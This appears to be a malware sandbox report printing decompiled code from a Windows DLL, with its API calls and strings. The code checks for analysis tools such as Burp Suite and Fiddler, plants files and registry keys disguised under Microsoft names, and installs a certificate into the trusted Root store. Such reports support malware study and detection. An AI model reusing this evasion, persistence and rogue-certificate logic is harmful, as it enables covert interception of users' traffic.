                                                                                                                                                                    						__eflags = _t12;
                                                                                                                                                                    						if(_t12 == 0) {
                                                                                                                                                                    							goto L15;
                                                                                                                                                                    						} else {
                                                                                                                                                                    							E100117FA();
                                                                                                                                                                    							 *0x10333818 = E10012FC8( *0x10333818);
                                                                                                                                                                    							 *0x1033381c = E10012FC8( *0x1033381c);
                                                                                                                                                                    							 *0x10333820 = E10012FC8( *0x10333820);
                                                                                                                                                                    							 *0x10333824 = E10012FC8( *0x10333824);
                                                                                                                                                                    							_t18 = E1000F88D();
                                                                                                                                                                    							__eflags = _t18;
                                                                                                                                                                    							if(_t18 == 0) {
                                                                                                                                                                    								L14:
                                                                                                                                                                    								E100130CA();
                                                                                                                                                                    								goto L15;
                                                                                                                                                                    							} else {
                                                                                                                                                                    								_push(L10013256);
                                                                                                                                                                    								_t21 =  *((intOrPtr*)(E10013034( *0x10333818)))();
                                                                                                                                                                    								__eflags = _t21 - 0xffffffff;
                                                                                                                                                                    								 *0x10332c68 = _t21;
                                                                                                                                                                    								if(_t21 == 0xffffffff) {
                                                                                                                                                                    									goto L14;
                                                                                                                                                                    								} else {
                                                                                                                                                                    									_t42 = E100148B1(1, 0x214);
                                                                                                                                                                    									__eflags = _t42;
                                                                                                                                                                    									if(_t42 == 0) {
                                                                                                                                                                    										goto L14;
                                                                                                                                                                    									} else {
                                                                                                                                                                    										_push(_t42);
                                                                                                                                                                    										_push( *0x10332c68);
                                                                                                                                                                    										__eflags =  *((intOrPtr*)(E10013034( *0x10333820)))();
                                                                                                                                                                    										if(__eflags == 0) {
                                                                                                                                                                    											goto L14;
                                                                                                                                                                    										} else {
                                                                                                                                                                    											_push(0);
                                                                                                                                                                    											_push(_t42);
                                                                                                                                                                    											E10013107(_t30, _t37, _t42, __eflags);
                                                                                                                                                                    											_t26 = GetCurrentThreadId();
                                                                                                                                                                    											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
                                                                                                                                                                    											 *_t42 = _t26;
                                                                                                                                                                    											_t11 = 1;
                                                                                                                                                                    										}
                                                                                                                                                                    									}
                                                                                                                                                                    								}
                                                                                                                                                                    							}
                                                                                                                                                                    						}
                                                                                                                                                                    					}
                                                                                                                                                                    					return _t11;
                                                                                                                                                                    				} else {
                                                                                                                                                                    					E100130CA();
                                                                                                                                                                    					return 0;
                                                                                                                                                                    				}
                                                                                                                                                                    			}

















                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,1000E9BD), ref: 100133E6
                                                                                                                                                                    • __mtterm.LIBCMT ref: 100133F2
                                                                                                                                                                      • Part of subcall function 100130CA: __decode_pointer.LIBCMT ref: 100130DB
                                                                                                                                                                      • Part of subcall function 100130CA: TlsFree.KERNEL32(00000024,1001355F), ref: 100130F5
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 10013408
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 10013415
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 10013422
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 1001342F
                                                                                                                                                                    • TlsAlloc.KERNEL32 ref: 1001347F
                                                                                                                                                                    • TlsSetValue.KERNEL32(00000000), ref: 1001349A
                                                                                                                                                                    • __init_pointers.LIBCMT ref: 100134A4
                                                                                                                                                                    • __encode_pointer.LIBCMT ref: 100134AF
                                                                                                                                                                    • __encode_pointer.LIBCMT ref: 100134BF
                                                                                                                                                                    • __encode_pointer.LIBCMT ref: 100134CF
                                                                                                                                                                    • __encode_pointer.LIBCMT ref: 100134DF
                                                                                                                                                                    • __decode_pointer.LIBCMT ref: 10013500
                                                                                                                                                                    • __calloc_crt.LIBCMT ref: 10013519
                                                                                                                                                                    • __decode_pointer.LIBCMT ref: 10013533
                                                                                                                                                                    • __initptd.LIBCMT ref: 10013542
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 10013549
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressProc__encode_pointer$__decode_pointer$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
                                                                                                                                                                    • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                                                                    • API String ID: 2657569430-3819984048
                                                                                                                                                                    • Opcode ID: e158e009452264019b86ef2b308fada79601061194b00a3a68f22d1eae1c8b62
                                                                                                                                                                    • Instruction ID: fc5c9c1e2f27ce9595d1d322ac009eb1f7bdbda0747ab5db418f9efda91381a0
                                                                                                                                                                    • Opcode Fuzzy Hash: e158e009452264019b86ef2b308fada79601061194b00a3a68f22d1eae1c8b62
                                                                                                                                                                    • Instruction Fuzzy Hash: A3318D75C04221AADB12EB78CCC69057BE9EB843A1F10C53AF508DE2A2DB35D489CF90
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                    			E100193D0(void* __ebx, void* __edi, void* __eflags, struct HWND__* _a4) {
                                                                                                                                                                    				char _v267;
                                                                                                                                                                    				char _v268;
                                                                                                                                                                    				char _v531;
                                                                                                                                                                    				char _v532;
                                                                                                                                                                    				void* _t35;
                                                                                                                                                                    				void* _t37;
                                                                                                                                                                    				void* _t38;
                                                                                                                                                                    				void* _t39;
                                                                                                                                                                    				void* _t41;
                                                                                                                                                                    				void* _t42;
                                                                                                                                                                    				void* _t43;
                                                                                                                                                                    				void* _t45;
                                                                                                                                                                    				void* _t46;
                                                                                                                                                                    				void* _t48;
                                                                                                                                                                    				void* _t51;
                                                                                                                                                                    				void* _t53;
                                                                                                                                                                    				void* _t55;
                                                                                                                                                                    				void* _t57;
                                                                                                                                                                    				void* _t61;
                                                                                                                                                                    				void* _t66;
                                                                                                                                                                    				void* _t88;
                                                                                                                                                                    				void* _t91;
                                                                                                                                                                    				void* _t92;
                                                                                                                                                                    				void* _t93;
                                                                                                                                                                    				void* _t94;
                                                                                                                                                                    				void* _t95;
                                                                                                                                                                    				void* _t96;
                                                                                                                                                                    				void* _t97;
                                                                                                                                                                    				void* _t98;
                                                                                                                                                                    				void* _t99;
                                                                                                                                                                    				void* _t100;
                                                                                                                                                                    
                                                                                                                                                                    				_t87 = __edi;
                                                                                                                                                                    				_t70 = __ebx;
                                                                                                                                                                    				_v532 = 0;
                                                                                                                                                                    				E1000CF20(__edi,  &_v531, 0, 0x103);
                                                                                                                                                                    				_v268 = 0;
                                                                                                                                                                    				E1000CF20(_t87,  &_v267, 0, 0x103);
                                                                                                                                                                    				GetClassNameA(_a4,  &_v532, 0x104);
                                                                                                                                                                    				GetWindowTextA(_a4,  &_v268, 0x104);
                                                                                                                                                                    				_t35 = E1000CAC0( &_v532);
                                                                                                                                                                    				_t91 = _t88 + 0x1c;
                                                                                                                                                                    				_t108 = _t35;
                                                                                                                                                                    				if(_t35 <= 0) {
                                                                                                                                                                    					L30:
                                                                                                                                                                    					return 1;
                                                                                                                                                                    				}
                                                                                                                                                                    				_t37 = E10019330(__ebx, _t87, _t108,  &_v532, "Afx:400000:8:10003:0:");
                                                                                                                                                                    				_t92 = _t91 + 8;
                                                                                                                                                                    				if(_t37 == 0) {
                                                                                                                                                                    					_t38 = E10019330(__ebx, _t87, __eflags,  &_v532, "TCPViewClass");
                                                                                                                                                                    					_t93 = _t92 + 8;
                                                                                                                                                                    					__eflags = _t38;
                                                                                                                                                                    					if(__eflags == 0) {
                                                                                                                                                                    						_t39 = E10019330(__ebx, _t87, __eflags,  &_v532, "TStdHttpAnalyzerForm");
                                                                                                                                                                    						_t94 = _t93 + 8;
                                                                                                                                                                    						__eflags = _t39;
                                                                                                                                                                    						if(__eflags == 0) {
                                                                                                                                                                    							_t41 = E10019330(_t70, _t87, __eflags,  &_v532, "gdkWindowToplevel");
                                                                                                                                                                    							_t95 = _t94 + 8;
                                                                                                                                                                    							__eflags = _t41;
                                                                                                                                                                    							if(__eflags == 0) {
                                                                                                                                                                    								_t42 = E10019330(_t70, _t87, __eflags,  &_v532, "XTPMainFrame");
                                                                                                                                                                    								_t96 = _t95 + 8;
                                                                                                                                                                    								__eflags = _t42;
                                                                                                                                                                    								if(_t42 == 0) {
                                                                                                                                                                    									_t43 = E1000CAC0( &_v268);
                                                                                                                                                                    									_t97 = _t96 + 4;
                                                                                                                                                                    									__eflags = _t43;
                                                                                                                                                                    									if(__eflags <= 0) {
                                                                                                                                                                    										L20:
                                                                                                                                                                    										_t45 = E1000CAC0( &_v268);
                                                                                                                                                                    										_t98 = _t97 + 4;
                                                                                                                                                                    										__eflags = _t45;
                                                                                                                                                                    										if(__eflags <= 0) {
                                                                                                                                                                    											L23:
                                                                                                                                                                    											_t46 = E10019330(_t70, _t87, __eflags,  &_v532, "SunAwtFrame");
                                                                                                                                                                    											_t99 = _t98 + 8;
                                                                                                                                                                    											__eflags = _t46;
                                                                                                                                                                    											if(_t46 == 0) {
                                                                                                                                                                    												goto L30;
                                                                                                                                                                    											}
                                                                                                                                                                    											_t48 = E1000CAC0( &_v268);
                                                                                                                                                                    											_t100 = _t99 + 4;
                                                                                                                                                                    											__eflags = _t48;
                                                                                                                                                                    											if(__eflags <= 0) {
                                                                                                                                                                    												L27:
                                                                                                                                                                    												__eflags = E1000CAC0( &_v268);
                                                                                                                                                                    												if(__eflags <= 0) {
                                                                                                                                                                    													goto L30;
                                                                                                                                                                    												}
                                                                                                                                                                    												_t51 = E10019330(_t70, _t87, __eflags,  &_v268, "Burp Suite");
                                                                                                                                                                    												__eflags = _t51;
                                                                                                                                                                    												if(_t51 == 0) {
                                                                                                                                                                    													goto L30;
                                                                                                                                                                    												}
                                                                                                                                                                    												 *0x10333dcc = 1;
                                                                                                                                                                    												return 0;
                                                                                                                                                                    											}
                                                                                                                                                                    											_t53 = E10019330(_t70, _t87, __eflags,  &_v268, "Charles");
                                                                                                                                                                    											_t100 = _t100 + 8;
                                                                                                                                                                    											__eflags = _t53;
                                                                                                                                                                    											if(_t53 == 0) {
                                                                                                                                                                    												goto L27;
                                                                                                                                                                    											}
                                                                                                                                                                    											 *0x10333dcc = 1;
                                                                                                                                                                    											return 0;
                                                                                                                                                                    										}
                                                                                                                                                                    										_t55 = E10019330(_t70, _t87, __eflags,  &_v268, "ASExplorer");
                                                                                                                                                                    										_t98 = _t98 + 8;
                                                                                                                                                                    										__eflags = _t55;
                                                                                                                                                                    										if(__eflags == 0) {
                                                                                                                                                                    											goto L23;
                                                                                                                                                                    										}
                                                                                                                                                                    										 *0x10333dcc = 1;
                                                                                                                                                                    										return 0;
                                                                                                                                                                    									}
                                                                                                                                                                    									_t57 = E10019330(_t70, _t87, __eflags,  &_v268, "Telerik Fiddler");
                                                                                                                                                                    									_t97 = _t97 + 8;
                                                                                                                                                                    									__eflags = _t57;
                                                                                                                                                                    									if(_t57 == 0) {
                                                                                                                                                                    										goto L20;
                                                                                                                                                                    									}
                                                                                                                                                                    									 *0x10333dcc = 1;
                                                                                                                                                                    									return 0;
                                                                                                                                                                    								}
                                                                                                                                                                    								__eflags = E1000CAC0( &_v268);
                                                                                                                                                                    								if(__eflags <= 0) {
                                                                                                                                                                    									L16:
                                                                                                                                                                    									goto L30;
                                                                                                                                                                    								}
                                                                                                                                                                    								_t61 = E10019330(_t70, _t87, __eflags,  &_v268, "HTTP Debugger");
                                                                                                                                                                    								__eflags = _t61;
                                                                                                                                                                    								if(_t61 == 0) {
                                                                                                                                                                    									goto L16;
                                                                                                                                                                    								}
                                                                                                                                                                    								 *0x10333dcc = 1;
                                                                                                                                                                    								return 0;
                                                                                                                                                                    							}
                                                                                                                                                                    							 *0x10333dcc = 1;
                                                                                                                                                                    							return 0;
                                                                                                                                                                    						}
                                                                                                                                                                    						 *0x10333dcc = 1;
                                                                                                                                                                    						return 0;
                                                                                                                                                                    					}
                                                                                                                                                                    					 *0x10333dcc = 1;
                                                                                                                                                                    					return 0;
                                                                                                                                                                    				}
                                                                                                                                                                    				_t66 = E1000CAC0( &_v268);
                                                                                                                                                                    				_t110 = _t66;
                                                                                                                                                                    				if(_t66 <= 0 || E10019330(__ebx, _t87, _t110,  &_v268, "WPE") == 0) {
                                                                                                                                                                    					goto L30;
                                                                                                                                                                    				} else {
                                                                                                                                                                    					 *0x10333dcc = 1;
                                                                                                                                                                    					return 0;
                                                                                                                                                                    				}
                                                                                                                                                                    			}
                                                                                                                                                                    0x10019667
                                                                                                                                                                    0x10019676
                                                                                                                                                                    0x10019678
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x10019686
                                                                                                                                                                    0x1001968e
                                                                                                                                                                    0x10019690
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x10019692
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x1001969c
                                                                                                                                                                    0x1001964b
                                                                                                                                                                    0x10019650
                                                                                                                                                                    0x10019653
                                                                                                                                                                    0x10019655
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x10019657
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x10019661
                                                                                                                                                                    0x100195f2
                                                                                                                                                                    0x100195f7
                                                                                                                                                                    0x100195fa
                                                                                                                                                                    0x100195fc
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x100195fe
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x10019608
                                                                                                                                                                    0x100195b1
                                                                                                                                                                    0x100195b6
                                                                                                                                                                    0x100195b9
                                                                                                                                                                    0x100195bb
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x100195bd
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x100195c7
                                                                                                                                                                    0x10019560
                                                                                                                                                                    0x10019562
                                                                                                                                                                    0x1001958d
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x1001958d
                                                                                                                                                                    0x10019570
                                                                                                                                                                    0x10019578
                                                                                                                                                                    0x1001957a
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x1001957c
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x10019586
                                                                                                                                                                    0x10019523
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x1001952d
                                                                                                                                                                    0x100194f5
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x100194ff
                                                                                                                                                                    0x100194c7
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x100194d1
                                                                                                                                                                    0x10019475
                                                                                                                                                                    0x1001947d
                                                                                                                                                                    0x1001947f
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x10019499
                                                                                                                                                                    0x10019499
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x100194a3

                                                                                                                                                                    APIs
                                                                                                                                                                    • _memset.LIBCMT ref: 100193EE
                                                                                                                                                                    • _memset.LIBCMT ref: 1001940B
                                                                                                                                                                    • GetClassNameA.USER32(?,00000000,00000104), ref: 10019423
                                                                                                                                                                    • GetWindowTextA.USER32 ref: 10019439
                                                                                                                                                                    • _strlen.LIBCMT ref: 10019446
                                                                                                                                                                      • Part of subcall function 10019330: _strlen.LIBCMT ref: 1001933B
                                                                                                                                                                      • Part of subcall function 10019330: _strlen.LIBCMT ref: 10019349
                                                                                                                                                                    • _strlen.LIBCMT ref: 10019475
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _strlen$_memset$ClassNameTextWindow
                                                                                                                                                                    • String ID: ASExplorer$Afx:400000:8:10003:0:$Burp Suite$Charles$HTTP Debugger$SunAwtFrame$TCPViewClass$TStdHttpAnalyzerForm$Telerik Fiddler$WPE$XTPMainFrame$gdkWindowToplevel
                                                                                                                                                                    • API String ID: 1565133231-1140939848
                                                                                                                                                                    • Opcode ID: 5a0ce18abdde982357f7fdf8f1a79584a6c51237df7161ac394efa5431355cbd
                                                                                                                                                                    • Instruction ID: a5f97e290b41472754b7e9ce8727d5d20b8c63e5840e42e0df40fd03ad5c4008
                                                                                                                                                                    • Opcode Fuzzy Hash: 5a0ce18abdde982357f7fdf8f1a79584a6c51237df7161ac394efa5431355cbd
                                                                                                                                                                    • Instruction Fuzzy Hash: 1C51B7B995020956EB50C770AC85FDA72BCEB20348F444464AA099B142FBB5F7C8CF71
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 84%
                                                                                                                                                                    			E1001FA30(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                    				char _v267;
                                                                                                                                                                    				char _v268;
                                                                                                                                                                    				char _v531;
                                                                                                                                                                    				char _v532;
                                                                                                                                                                    				char _v536;
                                                                                                                                                                    				char _v803;
                                                                                                                                                                    				char _v804;
                                                                                                                                                                    				void* _t44;
                                                                                                                                                                    				void* _t46;
                                                                                                                                                                    				void* _t48;
                                                                                                                                                                    				void* _t50;
                                                                                                                                                                    				void* _t52;
                                                                                                                                                                    				void* _t55;
                                                                                                                                                                    				void* _t94;
                                                                                                                                                                    
                                                                                                                                                                    				_t94 = __eflags;
                                                                                                                                                                    				_t77 = __edi;
                                                                                                                                                                    				_v536 = 0;
                                                                                                                                                                    				_v532 = 0;
                                                                                                                                                                    				E1000CF20(__edi,  &_v531, 0, 0x103);
                                                                                                                                                                    				__imp__SHGetSpecialFolderPathA(0,  &_v532, 0x1a, 0);
                                                                                                                                                                    				E1000CD96( &_v532,  &_v532, 0x104, "\\Microsoft\\Windows\\win_a.dat");
                                                                                                                                                                    				_v804 = 0;
                                                                                                                                                                    				E1000CF20(_t77,  &_v803, 0, 0x103);
                                                                                                                                                                    				__imp__SHGetSpecialFolderPathA(0,  &_v804, 0x1a, 0);
                                                                                                                                                                    				E1000CD96( &_v804,  &_v804, 0x104, "\\Microsoft\\Windows\\4b5ce2fe28308fd9");
                                                                                                                                                                    				_v268 = 0;
                                                                                                                                                                    				E1000CF20(_t77,  &_v267, 0, 0x103);
                                                                                                                                                                    				E1001F990(__ebx, _t77, __esi, _t94,  &_v268);
                                                                                                                                                                    				_t44 = E1001F680(_a8, _t94, 0x80000002, "SOFTWARE\\Microsoft\\XAML_A", _a4, _a8);
                                                                                                                                                                    				_t95 = _t44;
                                                                                                                                                                    				if(_t44 != 0) {
                                                                                                                                                                    					_t46 = E1001F680(_a4, _t95, 0x80000002, "SOFTWARE\\Microsoft\\XAML_B", _a4, _a8);
                                                                                                                                                                    					_t96 = _t46;
                                                                                                                                                                    					if(_t46 != 0) {
                                                                                                                                                                    						_t48 = E1001F5F0( &_v532, _t96,  &_v532, _a4, _a8);
                                                                                                                                                                    						_t97 = _t48;
                                                                                                                                                                    						if(_t48 != 0) {
                                                                                                                                                                    							_t50 = E1001F680( &_v532, _t97, 0x80000002, "SOFTWARE\\Microsoft\\a0b923820dcc509a", _a4, _a8);
                                                                                                                                                                    							_t98 = _t50;
                                                                                                                                                                    							if(_t50 != 0) {
                                                                                                                                                                    								_t52 = E1001F680(_a8, _t98, 0x80000002, "SOFTWARE\\Microsoft\\9d4c2f636f067f89", _a4, _a8);
                                                                                                                                                                    								_t99 = _t52;
                                                                                                                                                                    								if(_t52 != 0 && E1001F5F0(_a4, _t99,  &_v804, _a4, _a8) != 0) {
                                                                                                                                                                    									_t55 = E1001F720(__ebx, _t77, __esi, _a4, _a8);
                                                                                                                                                                    									_t101 = _t55;
                                                                                                                                                                    									if(_t55 != 0 && E1001F680( &_v268, _t101, 0x80000002,  &_v268, _a4, _a8) != 0) {
                                                                                                                                                                    										_v536 = 1;
                                                                                                                                                                    									}
                                                                                                                                                                    								}
                                                                                                                                                                    							}
                                                                                                                                                                    						}
                                                                                                                                                                    					}
                                                                                                                                                                    				}
                                                                                                                                                                    				return _v536;
                                                                                                                                                                    			}


















                                                                                                                                                                    APIs
                                                                                                                                                                    • _memset.LIBCMT ref: 1001FA58
                                                                                                                                                                    • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000), ref: 1001FA6D
                                                                                                                                                                    • _strcat_s.LIBCMT ref: 1001FA84
                                                                                                                                                                    • _memset.LIBCMT ref: 1001FAA1
                                                                                                                                                                    • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000), ref: 1001FAB6
                                                                                                                                                                    • _strcat_s.LIBCMT ref: 1001FACD
                                                                                                                                                                    • _memset.LIBCMT ref: 1001FAEA
                                                                                                                                                                      • Part of subcall function 1001F990: _memset.LIBCMT ref: 1001F9AE
                                                                                                                                                                      • Part of subcall function 1001F990: _strcat_s.LIBCMT ref: 1001F9E1
                                                                                                                                                                      • Part of subcall function 1001F990: _sprintf.LIBCMT ref: 1001FA08
                                                                                                                                                                      • Part of subcall function 1001F720: CryptStringToBinaryA.CRYPT32(10025F28,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001F75E
                                                                                                                                                                      • Part of subcall function 1001F720: CryptStringToBinaryA.CRYPT32(10025F28,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001F7A3
                                                                                                                                                                      • Part of subcall function 1001F720: CertCreateCertificateContext.CRYPT32(00000001,00000000,00000000), ref: 1001F7B3
                                                                                                                                                                      • Part of subcall function 1001F720: CertOpenStore.CRYPT32(0000000A,00000000,00000000,00024000,Root), ref: 1001F7E2
                                                                                                                                                                      • Part of subcall function 1001F720: CertAddCertificateContextToStore.CRYPT32(00000000,00000000,00000001,00000000), ref: 1001F801
                                                                                                                                                                      • Part of subcall function 1001F720: CertCloseStore.CRYPT32(00000000,00000001), ref: 1001F972
                                                                                                                                                                      • Part of subcall function 1001F720: CertFreeCertificateContext.CRYPT32(00000000), ref: 1001F97C
                                                                                                                                                                    Strings
                                                                                                                                                                    • \Microsoft\Windows\win_a.dat, xrefs: 1001FA73
                                                                                                                                                                    • SOFTWARE\Microsoft\XAML_B, xrefs: 1001FB2B
                                                                                                                                                                    • SOFTWARE\Microsoft\a0b923820dcc509a, xrefs: 1001FB6C
                                                                                                                                                                    • SOFTWARE\Microsoft\9d4c2f636f067f89, xrefs: 1001FB8A
                                                                                                                                                                    • \Microsoft\Windows\4b5ce2fe28308fd9, xrefs: 1001FABC
                                                                                                                                                                    • SOFTWARE\Microsoft\XAML_A, xrefs: 1001FB09
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Cert$_memset$CertificateContextStore_strcat_s$BinaryCryptFolderPathSpecialString$CloseCreateFreeOpen_sprintf
                                                                                                                                                                    • String ID: SOFTWARE\Microsoft\9d4c2f636f067f89$SOFTWARE\Microsoft\XAML_A$SOFTWARE\Microsoft\XAML_B$SOFTWARE\Microsoft\a0b923820dcc509a$\Microsoft\Windows\4b5ce2fe28308fd9$\Microsoft\Windows\win_a.dat
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                    			E100211B0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr* _a24) {
                                                                                                                                                                    				char _v8;
                                                                                                                                                                    				char _v12;
                                                                                                                                                                    				char* _v16;
                                                                                                                                                                    				char* _v20;
                                                                                                                                                                    				char _v24;
                                                                                                                                                                    				char _v28;
                                                                                                                                                                    				char _v32;
                                                                                                                                                                    				char _v35;
                                                                                                                                                                    				char _v39;
                                                                                                                                                                    				char _v43;
                                                                                                                                                                    				char _v44;
                                                                                                                                                                    				void* _t86;
                                                                                                                                                                    				void* _t88;
                                                                                                                                                                    				intOrPtr _t91;
                                                                                                                                                                    				void* _t92;
                                                                                                                                                                    				void* _t120;
                                                                                                                                                                    				void* _t140;
                                                                                                                                                                    				void* _t141;
                                                                                                                                                                    				void* _t191;
                                                                                                                                                                    				void* _t192;
                                                                                                                                                                    				void* _t193;
                                                                                                                                                                    				void* _t194;
                                                                                                                                                                    				void* _t195;
                                                                                                                                                                    				void* _t196;
                                                                                                                                                                    
                                                                                                                                                                    				_t192 = __esi;
                                                                                                                                                                    				_t191 = __edi;
                                                                                                                                                                    				_t141 = __ebx;
                                                                                                                                                                    				_v32 = 0;
                                                                                                                                                                    				_v20 = "https://";
                                                                                                                                                                    				_v16 = "http://";
                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                    				_v28 = 0;
                                                                                                                                                                    				_v24 = 0;
                                                                                                                                                                    				_v44 = 0;
                                                                                                                                                                    				_v43 = 0;
                                                                                                                                                                    				_v39 = 0;
                                                                                                                                                                    				_v35 = 0;
                                                                                                                                                                    				_t86 = E10001A50(_a4, _v20);
                                                                                                                                                                    				_t194 = _t193 + 8;
                                                                                                                                                                    				if(_t86 != 0) {
                                                                                                                                                                    					L2:
                                                                                                                                                                    					_v8 = _a4;
                                                                                                                                                                    					_t88 = E10001A50(_a4, _v20);
                                                                                                                                                                    					_t195 = _t194 + 8;
                                                                                                                                                                    					if(_t88 == 0) {
                                                                                                                                                                    						 *_a8 = 0;
                                                                                                                                                                    						_v8 = _v8 + 7;
                                                                                                                                                                    						 *_a20 = 0x50;
                                                                                                                                                                    					} else {
                                                                                                                                                                    						 *_a8 = 1;
                                                                                                                                                                    						_v8 = _v8 + 8;
                                                                                                                                                                    						 *_a20 = 0x1bb;
                                                                                                                                                                    					}
                                                                                                                                                                    					_t91 = E10001A50(_v8, "/");
                                                                                                                                                                    					_t196 = _t195 + 8;
                                                                                                                                                                    					_v28 = _t91;
                                                                                                                                                                    					if(_v28 == 0) {
                                                                                                                                                                    						_t92 = E1000CAC0(_v8);
                                                                                                                                                                    						_t196 = _t196 + 4;
                                                                                                                                                                    						_v24 = _t92 + 1;
                                                                                                                                                                    					} else {
                                                                                                                                                                    						_v24 = _v28 - _v8 + 1;
                                                                                                                                                                    					}
                                                                                                                                                                    					 *_a12 = L1000CE56(_t141, _v24, _t191, _t192, _v24);
                                                                                                                                                                    					E1000CF20(_t191,  *_a12, 0, _v24);
                                                                                                                                                                    					E1000D190(_t141, _t191, _t192,  *_a12, _v8, _v24 - 1);
                                                                                                                                                                    					_v28 = E10001A50(_v8, "/");
                                                                                                                                                                    					if(_v28 == 0) {
                                                                                                                                                                    						_v24 = 2;
                                                                                                                                                                    						 *_a24 = L1000CE56(_t141, _v24, _t191, _t192, _v24);
                                                                                                                                                                    						E1000CF20(_t191,  *_a24, 0, _v24);
                                                                                                                                                                    						E1000E280( *_a24, "/");
                                                                                                                                                                    					} else {
                                                                                                                                                                    						_v24 = E1000CAC0(_v8) - _v28 - _v8 + 1;
                                                                                                                                                                    						 *_a24 = L1000CE56(_t141, _v28 - _v8, _t191, _t192, _v24);
                                                                                                                                                                    						E1000CF20(_t191,  *_a24, 0, _v24);
                                                                                                                                                                    						E1000E280( *_a24, _v28);
                                                                                                                                                                    					}
                                                                                                                                                                    					_v8 = E10001A50( *_a12, ":");
                                                                                                                                                                    					if(_v8 == 0) {
                                                                                                                                                                    						_t181 = _a12;
                                                                                                                                                                    						_v24 = E1000CAC0( *_a12) + 1;
                                                                                                                                                                    					} else {
                                                                                                                                                                    						_v24 = _v8 -  *_a12 + 1;
                                                                                                                                                                    						_t120 = E1000CAC0( *_a12);
                                                                                                                                                                    						_t181 =  &_v44;
                                                                                                                                                                    						E1000D190(_t141, _t191, _t192,  &_v44, _v8 + 1, _t120 - _v24);
                                                                                                                                                                    						E1000E5E5( &_v44, "%d", _a20);
                                                                                                                                                                    					}
                                                                                                                                                                    					 *_a16 = L1000CE56(_t141, _t181, _t191, _t192, _v24);
                                                                                                                                                                    					E1000CF20(_t191,  *_a16, 0, _v24);
                                                                                                                                                                    					E1000D190(_t141, _t191, _t192,  *_a16,  *_a12, _v24 - 1);
                                                                                                                                                                    					_v32 = 1;
                                                                                                                                                                    				} else {
                                                                                                                                                                    					_t140 = E10001A50(_a4, _v16);
                                                                                                                                                                    					_t194 = _t194 + 8;
                                                                                                                                                                    					if(_t140 != 0) {
                                                                                                                                                                    						goto L2;
                                                                                                                                                                    					}
                                                                                                                                                                    				}
